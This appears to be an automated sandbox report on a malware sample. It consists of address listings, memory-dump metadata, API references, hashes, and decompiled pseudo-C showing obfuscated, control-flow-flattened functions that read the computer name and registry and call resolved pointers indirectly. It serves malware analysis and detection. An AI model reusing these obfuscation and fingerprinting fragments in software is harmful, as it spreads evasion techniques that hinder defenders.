                                                                                                                                                        0x005c7c8e
                                                                                                                                                        0x005c7c93
                                                                                                                                                        0x005c7c99
                                                                                                                                                        0x005c7ca8
                                                                                                                                                        0x005c7cac
                                                                                                                                                        0x005c7cb1
                                                                                                                                                        0x005c7cb6
                                                                                                                                                        0x005c7cb6
                                                                                                                                                        0x005c7c93
                                                                                                                                                        0x00000000
                                                                                                                                                        0x005c7c88
                                                                                                                                                        0x005c7c39
                                                                                                                                                        0x005c7db6
                                                                                                                                                        0x005c7e8d
                                                                                                                                                        0x005c7e93
                                                                                                                                                        0x005c7e99
                                                                                                                                                        0x005c7e9e
                                                                                                                                                        0x005c7ea3
                                                                                                                                                        0x005c7ea8
                                                                                                                                                        0x005c7eb3
                                                                                                                                                        0x005c7eb6
                                                                                                                                                        0x005c7eb9
                                                                                                                                                        0x005c7eca
                                                                                                                                                        0x005c7ed0
                                                                                                                                                        0x005c7ed6
                                                                                                                                                        0x005c7edb
                                                                                                                                                        0x005c7ede
                                                                                                                                                        0x005c7eec
                                                                                                                                                        0x00000000
                                                                                                                                                        0x005c7eec
                                                                                                                                                        0x005c7dc1
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x005c7f11
                                                                                                                                                        0x005c7f11
                                                                                                                                                        0x005c7c44
                                                                                                                                                        0x005c7def
                                                                                                                                                        0x005c7e03
                                                                                                                                                        0x00000000
                                                                                                                                                        0x005c7e03
                                                                                                                                                        0x005c7c4f
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x005c7c51

                                                                                                                                                        APIs
                                                                                                                                                        • RegOpenKeyExA.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,D179479F,A4EA36C8,00000000,?), ref: 005C7D8E
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000B.00000002.399411659.00000000005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                        • Associated: 0000000B.00000002.399402581.00000000005C0000.00000002.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.399473393.00000000005D4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.399490424.00000000005D7000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Open
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 71445658-0
                                                                                                                                                        • Opcode ID: 54f65fc0dc1a3516c6086437c921a44873b4ea52fb9af2cb0b0329832b79d16e
                                                                                                                                                        • Instruction ID: 0ba498803fbd8ceb188728acdd012861195dbfbf4fbb1059d83f818cb3a45ed1
                                                                                                                                                        • Opcode Fuzzy Hash: 54f65fc0dc1a3516c6086437c921a44873b4ea52fb9af2cb0b0329832b79d16e
                                                                                                                                                        • Instruction Fuzzy Hash: C181F97630D6888EDB64CB99E451B5ABAA0F38CB54F54441AEB9EC7F18DB38CC508F01
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 005CD1C4, Relevance: 1.7, APIs: 1, Instructions: 153COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 60%
                                                                                                                                                        			E005CD1C4(intOrPtr __rcx, intOrPtr __rdx) {
				char _v68;
				char _v72;
				void* _v80;
				long long _v88;
				void* _v96;
				signed long long _v104;
				void* _v112;
				intOrPtr _v120;
				intOrPtr _v124;
				void* _v128;
				char _v129;
				void* _t47;
				void* _t81;
				signed long long _t88;
				long long* _t90;
				intOrPtr* _t94;
				signed long long _t96;
				intOrPtr _t106;
				signed long long* _t108;
				intOrPtr _t110;
				long long _t111;
				long long _t112;
				long long _t113;

				_t108 =  &_v104;
				_t110 = __rdx;
				_t106 = __rcx;
				_t94 =  &_v68;
				_v96 = _t94;
				_t88 = _v96;
				 *_t94 = 0x14;
				r13d = 0;
				r8d = 0x913338ad;
				r9d = 0x74;
				E005CFAD7(1, _t81, _t88, __rcx);
				_t98 = __rcx;
				GetComputerNameA(??, ??); // executed
				_v129 =  *((intOrPtr*)(__rcx));
				_t96 =  &_v128 | _t88;
				_t47 = 0x72f0bc31;
				_t112 =  &_v72;
				_t113 =  &_v112;
				L1:
				while(_t47 > 0x31a4f3ac) {
					if(_t47 > 0x368c7021) {
						if(_t47 == 0x368c7022) {
							_v88 = _t112;
							_v80 = _t113;
							_t90 = _v80;
							_v112 = _t111;
							r8d = 0x8ece2d00;
							r9d = 0x209;
							E005CFAD7(0xa, _t81, _t90, _t98);
							 *_t90(); // executed
							_t88 = _v112;
							_v104 = _t88;
							_t47 =  ==  ? 0x31a4f3ad : 0x2d657e6;
						} else {
							if(_t47 == 0x72f0bc31) {
								_t47 =  ==  ? 0x900af59d : 0x368c7022;
							}
						}
						continue;
					}
					if(_t47 == 0x31a4f3ad) {
						_v128 = r13b;
						_v124 = 0x21a85fec;
						_v120 = 0x73bf45ed;
						if(_v128 != r13b) {
							L16:
							_t98 = _t110;
							r8d = 8;
							E005CC96E(_t47, _t110, _t96);
							_t47 = 0x134a0c57;
							continue;
						}
						do {
							 *(_t108 + 0x2c + _t88 * 4) =  *(_t108 + 0x2c + _t88 * 4) & 0x8c10ef5d |  !( *(_t108 + 0x2c + _t88 * 4)) & 0x73ef10a2;
							_t47 = 1;
						} while (_t88 == 0);
						goto L16;
					} else {
						if(_t47 == 0x31fa4db0) {
							E005CC3D4(_v104, _t110);
							r8d = 0xd4d62162;
							r9d = 0x208;
							E005CFAD7(0xa, _t81, _t88, _v104);
							_t98 = _v112;
							 *_t88();
							_t47 = 0x134a0c57;
						}
						continue;
					}
				}
				if(_t47 == 0x900af59d) {
					_v128 = r13b;
					_v124 = 0x73bca5c0;
					_v120 = 0x32f8abda;
					if(_v128 != r13b) {
						L20:
						_t98 = _t106;
						r8d = 7;
						E005CC96E(_t47, _t106, _t96);
						_t47 = 0x368c7022;
						goto L1;
					}
					do {
						 *(_t108 + 0x2c + _t88 * 4) = ( *(_t108 + 0x2c + _t88 * 4) & 0x9ec2c1cc |  !( *(_t108 + 0x2c + _t88 * 4)) & 0x613d3e33) ^ 0x53c5d4bd;
						_t47 = 1;
					} while (_t88 == 0);
					goto L20;
				}
				if(_t47 == 0x2d657e6) {
					_t88 = _v104;
					_t47 =  ==  ? 0x31a4f3ad : 0x31fa4db0;
					goto L1;
				}
				if(_t47 != 0x134a0c57) {
					goto L1;
				}
				return _t47;
			}


























                                                                                                                                                        0x005cd1d0
                                                                                                                                                        0x005cd1d4
                                                                                                                                                        0x005cd1d7
                                                                                                                                                        0x005cd1da
                                                                                                                                                        0x005cd1df
                                                                                                                                                        0x005cd1e4
                                                                                                                                                        0x005cd1e9
                                                                                                                                                        0x005cd1ef
                                                                                                                                                        0x005cd1f9
                                                                                                                                                        0x005cd1ff
                                                                                                                                                        0x005cd205
                                                                                                                                                        0x005cd20a
                                                                                                                                                        0x005cd210
                                                                                                                                                        0x005cd214
                                                                                                                                                        0x005cd222
                                                                                                                                                        0x005cd225
                                                                                                                                                        0x005cd22f
                                                                                                                                                        0x005cd234
                                                                                                                                                        0x00000000
                                                                                                                                                        0x005cd239
                                                                                                                                                        0x005cd245
                                                                                                                                                        0x005cd2b6
                                                                                                                                                        0x005cd3b4
                                                                                                                                                        0x005cd3be
                                                                                                                                                        0x005cd3c3
                                                                                                                                                        0x005cd3c8
                                                                                                                                                        0x005cd3d4
                                                                                                                                                        0x005cd3da
                                                                                                                                                        0x005cd3e0
                                                                                                                                                        0x005cd3ed
                                                                                                                                                        0x005cd3ef
                                                                                                                                                        0x005cd3f4
                                                                                                                                                        0x005cd403
                                                                                                                                                        0x005cd2bc
                                                                                                                                                        0x005cd2c1
                                                                                                                                                        0x005cd2d6
                                                                                                                                                        0x005cd2d6
                                                                                                                                                        0x005cd2c1
                                                                                                                                                        0x00000000
                                                                                                                                                        0x005cd2b6
                                                                                                                                                        0x005cd24c
                                                                                                                                                        0x005cd2de
                                                                                                                                                        0x005cd2e3
                                                                                                                                                        0x005cd2eb
                                                                                                                                                        0x005cd2f8
                                                                                                                                                        0x005cd320
                                                                                                                                                        0x005cd320
                                                                                                                                                        0x005cd326
                                                                                                                                                        0x005cd32c
                                                                                                                                                        0x005cd331
                                                                                                                                                        0x00000000
                                                                                                                                                        0x005cd331
                                                                                                                                                        0x005cd2fc
                                                                                                                                                        0x005cd312
                                                                                                                                                        0x005cd319
                                                                                                                                                        0x005cd319
                                                                                                                                                        0x00000000
                                                                                                                                                        0x005cd252
                                                                                                                                                        0x005cd257
                                                                                                                                                        0x005cd261
                                                                                                                                                        0x005cd272
                                                                                                                                                        0x005cd278
                                                                                                                                                        0x005cd27e
                                                                                                                                                        0x005cd283
                                                                                                                                                        0x005cd286
                                                                                                                                                        0x005cd288
                                                                                                                                                        0x005cd288
                                                                                                                                                        0x00000000
                                                                                                                                                        0x005cd257
                                                                                                                                                        0x005cd24c
                                                                                                                                                        0x005cd294
                                                                                                                                                        0x005cd33b
                                                                                                                                                        0x005cd340
                                                                                                                                                        0x005cd348
                                                                                                                                                        0x005cd355
                                                                                                                                                        0x005cd383
                                                                                                                                                        0x005cd383
                                                                                                                                                        0x005cd389
                                                                                                                                                        0x005cd38f
                                                                                                                                                        0x005cd394
                                                                                                                                                        0x00000000
                                                                                                                                                        0x005cd394
                                                                                                                                                        0x005cd359
                                                                                                                                                        0x005cd375
                                                                                                                                                        0x005cd37c
                                                                                                                                                        0x005cd37c
                                                                                                                                                        0x00000000
                                                                                                                                                        0x005cd359
                                                                                                                                                        0x005cd29f
                                                                                                                                                        0x005cd39e
                                                                                                                                                        0x005cd3ac
                                                                                                                                                        0x00000000
                                                                                                                                                        0x005cd3ac
                                                                                                                                                        0x005cd2aa
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x005cd42a

                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000B.00000002.399411659.00000000005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                        • Associated: 0000000B.00000002.399402581.00000000005C0000.00000002.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.399473393.00000000005D4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.399490424.00000000005D7000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ComputerName
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3545744682-0
                                                                                                                                                        • Opcode ID: 3c3e849541630cc18eba3320f716b724929dd22066de87ccf0355ed67c512196
                                                                                                                                                        • Instruction ID: 13c45eec7edcf7a26068c58228c4a9f3f62830268e233f69af524f77bc6867f4
                                                                                                                                                        • Opcode Fuzzy Hash: 3c3e849541630cc18eba3320f716b724929dd22066de87ccf0355ed67c512196
                                                                                                                                                        • Instruction Fuzzy Hash: 3A51EC263086448ACA248B9AF454B1FAF60F3C9784F54552EEF8EC7B54CB7DC8459B01
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 005CC450, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 15%
                                                                                                                                                        			E005CC450(signed long long __rax, long long __rcx) {
				char _v52;
				char _v72;
				intOrPtr _v80;
				long long _v88;
				int _t23;
				void* _t39;
				signed long long _t44;
				char* _t46;
				intOrPtr* _t47;
				long long _t48;
				void* _t49;

				_t44 = __rax;
				_t48 = __rcx;
				r8d = 0xe249a58d;
				r9d = 0xac;
				E005CFAD7(1, _t39, __rax, __rcx);
				_t46 =  &_v72;
				 *_t44();
				_t47 =  &_v52;
				 *((char*)(_t47 - 4)) = 0;
				 *_t47 = 0x32816739;
				 *((intOrPtr*)(_t47 + 4)) = 0x32816739;
				 *((intOrPtr*)(_t47 + 8)) = 0x32b5676d;
				 *((intOrPtr*)(_t47 + 0xc)) = 0x32d5670d;
				 *((intOrPtr*)(_t47 + 0x10)) = 0x329c6724;
				 *((intOrPtr*)(_t47 + 0x14)) = 0x32f86740;
				if( *((intOrPtr*)(_t47 - 4)) == 0) {
					do {
						 *(_t49 + 0x40 + _t44 * 4) =  *(_t49 + 0x40 + _t44 * 4) & 0xcd0798bf |  !( *(_t49 + 0x40 + _t44 * 4)) & 0x32f86740;
						_t46 = _t46 + 1;
						_t44 = _t44 + 1;
					} while (_t44 != 7);
				}
				r8d = 0xc87545f4;
				r9d = 0xcc;
				E005CFAD7(1, _t39, _t44, _t46);
				_v88 = _t48;
				_v80 = 0xc;
				_t23 = GetDateFormatW(??, ??, ??, ??, ??, ??); // executed
				return _t23;
			}














                                                                                                                                                        0x005cc450
                                                                                                                                                        0x005cc457
                                                                                                                                                        0x005cc463
                                                                                                                                                        0x005cc469
                                                                                                                                                        0x005cc46f
                                                                                                                                                        0x005cc474
                                                                                                                                                        0x005cc479
                                                                                                                                                        0x005cc47b
                                                                                                                                                        0x005cc480
                                                                                                                                                        0x005cc488
                                                                                                                                                        0x005cc48a
                                                                                                                                                        0x005cc48d
                                                                                                                                                        0x005cc494
                                                                                                                                                        0x005cc49b
                                                                                                                                                        0x005cc4a2
                                                                                                                                                        0x005cc4ac
                                                                                                                                                        0x005cc4b5
                                                                                                                                                        0x005cc4cb
                                                                                                                                                        0x005cc4cf
                                                                                                                                                        0x005cc4d2
                                                                                                                                                        0x005cc4d5
                                                                                                                                                        0x005cc4b5
                                                                                                                                                        0x005cc4e2
                                                                                                                                                        0x005cc4e8
                                                                                                                                                        0x005cc4ee
                                                                                                                                                        0x005cc4f3
                                                                                                                                                        0x005cc4f8
                                                                                                                                                        0x005cc50f
                                                                                                                                                        0x005cc519

                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000B.00000002.399411659.00000000005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                        • Associated: 0000000B.00000002.399402581.00000000005C0000.00000002.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.399473393.00000000005D4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.399490424.00000000005D7000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DateFormat
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2793631785-0
                                                                                                                                                        • Opcode ID: 50378c0f2bcc1f64eda8536ac104d2ffe73bbeeb79143c7527775f7fd14e6f08
                                                                                                                                                        • Instruction ID: 86e6dac09b1715b896a5c2059820fa69e4457b4665598f40f593e80fb8a04a02
                                                                                                                                                        • Opcode Fuzzy Hash: 50378c0f2bcc1f64eda8536ac104d2ffe73bbeeb79143c7527775f7fd14e6f08
                                                                                                                                                        • Instruction Fuzzy Hash: EB1123B23142848BE718DF55F340B5EAE51F3A4344F04C139DB4947B44CB78D5628B00
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00007FFD69656AB8, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000B.00000002.401806986.00007FFD69641000.00000020.00020000.sdmp, Offset: 00007FFD69640000, based on PE: true
                                                                                                                                                        • Associated: 0000000B.00000002.401802701.00007FFD69640000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401827279.00007FFD6965A000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401845076.00007FFD6966D000.00000004.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401851494.00007FFD6966F000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401855669.00007FFD69671000.00000002.00020000.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                        • Opcode ID: 98ec99578ddaa3c9d7266ab374f08f10c5501da80b5d5e44bb4fae79c6d5e467
                                                                                                                                                        • Instruction ID: 57ed26df4c683bde290b5c27ade668295a2318eea03cc7c97a18c0ad245d353a
                                                                                                                                                        • Opcode Fuzzy Hash: 98ec99578ddaa3c9d7266ab374f08f10c5501da80b5d5e44bb4fae79c6d5e467
                                                                                                                                                        • Instruction Fuzzy Hash: 5C113D32B18F86C2F3119F95A8A0579B3A4EB40758F450436D69E47796DE3CE860C702
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00007FFD69652944, Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • RtlAllocateHeap.NTDLL(?,?,00000000,00007FFD69652FEA,?,?,00000040,00007FFD696534DD,?,?,?,?,00007FFD69652811,?,?,?), ref: 00007FFD69652999
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000B.00000002.401806986.00007FFD69641000.00000020.00020000.sdmp, Offset: 00007FFD69640000, based on PE: true
                                                                                                                                                        • Associated: 0000000B.00000002.401802701.00007FFD69640000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401827279.00007FFD6965A000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401845076.00007FFD6966D000.00000004.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401851494.00007FFD6966F000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401855669.00007FFD69671000.00000002.00020000.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                                        • Opcode ID: 6cc97a963e6884d7f7963e7ba5670dee71c7b68eb39f74fd178502d1c1dd6273
                                                                                                                                                        • Instruction ID: b005f96dc19b0f94854ba00c59c0fe4f8a3e81ce873956a4d3631314cd9c369f
                                                                                                                                                        • Opcode Fuzzy Hash: 6cc97a963e6884d7f7963e7ba5670dee71c7b68eb39f74fd178502d1c1dd6273
                                                                                                                                                        • Instruction Fuzzy Hash: 15F06D15F09B43C2FF595EE699707B452902F88BA8F0C0430C80E863CAEE2CE496C213
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00007FFD6964438F, Relevance: 1.3, APIs: 1, Instructions: 30COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000B.00000002.401806986.00007FFD69641000.00000020.00020000.sdmp, Offset: 00007FFD69640000, based on PE: true
                                                                                                                                                        • Associated: 0000000B.00000002.401802701.00007FFD69640000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401827279.00007FFD6965A000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401845076.00007FFD6966D000.00000004.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401851494.00007FFD6966F000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401855669.00007FFD69671000.00000002.00020000.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FreeVirtual
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1263568516-0
                                                                                                                                                        • Opcode ID: 5ffb13a6993b982a2eb95589b6c56fbd6ffc133fe00e69a41accd928428fcfcc
                                                                                                                                                        • Instruction ID: aa71175df44880e4ada9bb781a069fb617a3eff29d83d052f44624434c0d4cf2
                                                                                                                                                        • Opcode Fuzzy Hash: 5ffb13a6993b982a2eb95589b6c56fbd6ffc133fe00e69a41accd928428fcfcc
                                                                                                                                                        • Instruction Fuzzy Hash: DCF03001F08D5581F96A4DDBAC6273540E55FD8FBCF6D8032E81DC72A0EDA8DC814B42
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Non-executed Functions

                                                                                                                                                        Function 00007FFD69649D9D, Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 227pipetimeCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000B.00000002.401806986.00007FFD69641000.00000020.00020000.sdmp, Offset: 00007FFD69640000, based on PE: true
                                                                                                                                                        • Associated: 0000000B.00000002.401802701.00007FFD69640000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401827279.00007FFD6965A000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401845076.00007FFD6966D000.00000004.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401851494.00007FFD6966F000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401855669.00007FFD69671000.00000002.00020000.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ForwardingKeyboardLayoutNameParentProxyScaleTimeViewport$ApplicationCreateDateFileFillFormatFunction13Function24IndirectMetaModelNamedPathPipeUserWait
                                                                                                                                                        • String ID: pK<$e<
                                                                                                                                                        • API String ID: 3688862046-3389707211
                                                                                                                                                        • Opcode ID: 634206d3ac24be4e6fe5eebe1c54df5ce1c257440756dbd8180be9a067e64399
                                                                                                                                                        • Instruction ID: bf8e7a1131b2d324c761b1e5c64bd0ba22fbdb5b65eff02038206dadde324caf
                                                                                                                                                        • Opcode Fuzzy Hash: 634206d3ac24be4e6fe5eebe1c54df5ce1c257440756dbd8180be9a067e64399
                                                                                                                                                        • Instruction Fuzzy Hash: AEB15D36708B85CBD624CF85E4946AEB7A1F784BA8F508036EA9D47B98CF7CD445CB01
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00007FFD69646DAE, Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 252filewindowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • HBRUSH_UserUnmarshal.OLE32(?,?,-1C2FAE83,?,?,?,?,?,?,?,00007FFD6964B548), ref: 00007FFD69646E44
                                                                                                                                                        • NdrProxyForwardingFunction24.OLE32(?,?,-1C2FAE83,?,?,?,?,?,?,?,00007FFD6964B548), ref: 00007FFD69646E9D
                                                                                                                                                        • NdrProxyForwardingFunction13.OLE32 ref: 00007FFD69646F21
                                                                                                                                                        • CoReactivateObject.OLE32(?,?,-1C2FAE83,?,?,?,?,?,?,?,00007FFD6964B548), ref: 00007FFD69646F87
                                                                                                                                                        • ExtractIconEx.SHELL32 ref: 00007FFD69646FAE
                                                                                                                                                        • HMONITOR_UserMarshal.OLE32(?,?,-1C2FAE83,?,?,?,?,?,?,?,00007FFD6964B548), ref: 00007FFD69647084
                                                                                                                                                        • DragQueryFileA.SHELL32(?,?,-1C2FAE83,?,?,?,?,?,?,?,00007FFD6964B548), ref: 00007FFD696470B9
                                                                                                                                                        • CancelSynchronousIo.KERNEL32(?,?,-1C2FAE83,?,?,?,?,?,?,?,00007FFD6964B548), ref: 00007FFD696470E0
                                                                                                                                                        • SetMetaRgn.GDI32(?,?,-1C2FAE83,?,?,?,?,?,?,?,00007FFD6964B548), ref: 00007FFD69647126
                                                                                                                                                        • SetMetaRgn.GDI32(?,?,-1C2FAE83,?,?,?,?,?,?,?,00007FFD6964B548), ref: 00007FFD69647182
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000B.00000002.401806986.00007FFD69641000.00000020.00020000.sdmp, Offset: 00007FFD69640000, based on PE: true
                                                                                                                                                        • Associated: 0000000B.00000002.401802701.00007FFD69640000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401827279.00007FFD6965A000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401845076.00007FFD6966D000.00000004.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401851494.00007FFD6966F000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401855669.00007FFD69671000.00000002.00020000.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ForwardingMetaProxyUser$CancelDragExtractFileFunction13Function24IconMarshalObjectQueryReactivateSynchronousUnmarshal
                                                                                                                                                        • String ID: &~7$knO5$So'
                                                                                                                                                        • API String ID: 2996200542-3724885621
                                                                                                                                                        • Opcode ID: 088cc110e9f5fb75cc28e2c347f274effc26df474b9993827dd9166c9d88ee73
                                                                                                                                                        • Instruction ID: 1977ae805e806a21c0d3a854a873e40831a69b153ed53822b9233ba2c93844bd
                                                                                                                                                        • Opcode Fuzzy Hash: 088cc110e9f5fb75cc28e2c347f274effc26df474b9993827dd9166c9d88ee73
                                                                                                                                                        • Instruction Fuzzy Hash: 4FB1C272708B81C7E6209F95E45026E77A1F785BA8F508236EA6D47BD8DF3DD805CB02
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00007FFD696531A0, Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000B.00000002.401806986.00007FFD69641000.00000020.00020000.sdmp, Offset: 00007FFD69640000, based on PE: true
                                                                                                                                                        • Associated: 0000000B.00000002.401802701.00007FFD69640000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401827279.00007FFD6965A000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401845076.00007FFD6966D000.00000004.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401851494.00007FFD6966F000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401855669.00007FFD69671000.00000002.00020000.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1239891234-0
                                                                                                                                                        • Opcode ID: 31669b5bb333a9c36f51370141e400dcfa43fc223199287eeb8d2431e9fda4e2
                                                                                                                                                        • Instruction ID: fad71cfefd6ad56c6b014c49fe81dd568428c5a6cea3c1ce3e4c8185425d138a
                                                                                                                                                        • Opcode Fuzzy Hash: 31669b5bb333a9c36f51370141e400dcfa43fc223199287eeb8d2431e9fda4e2
                                                                                                                                                        • Instruction Fuzzy Hash: 25315C32708F81C6EB60CF65E8506AE73A0FB887A8F500136EA9D43B98DF38D555CB01
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00007FFD69653508, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 00007FFD69653538
                                                                                                                                                          • Part of subcall function 00007FFD696533D4: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FFD696533B1), ref: 00007FFD696533DD
                                                                                                                                                          • Part of subcall function 00007FFD696533D4: GetCurrentProcess.KERNEL32(?,?,?,?,00007FFD696533B1), ref: 00007FFD69653402
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000B.00000002.401806986.00007FFD69641000.00000020.00020000.sdmp, Offset: 00007FFD69640000, based on PE: true
                                                                                                                                                        • Associated: 0000000B.00000002.401802701.00007FFD69640000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401827279.00007FFD6965A000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401845076.00007FFD6966D000.00000004.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401851494.00007FFD6966F000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401855669.00007FFD69671000.00000002.00020000.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CurrentFeaturePresentProcessProcessor_invalid_parameter_noinfo
                                                                                                                                                        • String ID: *?$.
                                                                                                                                                        • API String ID: 4036615347-3972193922
                                                                                                                                                        • Opcode ID: fdab983c2e3d3385578c35eda9020d5246adb01500676316764ef2fd7356c748
                                                                                                                                                        • Instruction ID: e2267a795b11c07d88e6931d74b170fc7ec2e29a2f08ac84d7c5d8d1204883c7
                                                                                                                                                        • Opcode Fuzzy Hash: fdab983c2e3d3385578c35eda9020d5246adb01500676316764ef2fd7356c748
                                                                                                                                                        • Instruction Fuzzy Hash: 2151CE62B14F96C5EB14DFA299208A967A4FB58FECB444535DE1E17B85EE3CD0428301
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00007FFD6964A6E2, Relevance: 28.4, APIs: 9, Strings: 7, Instructions: 366memoryfileCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000B.00000002.401806986.00007FFD69641000.00000020.00020000.sdmp, Offset: 00007FFD69640000, based on PE: true
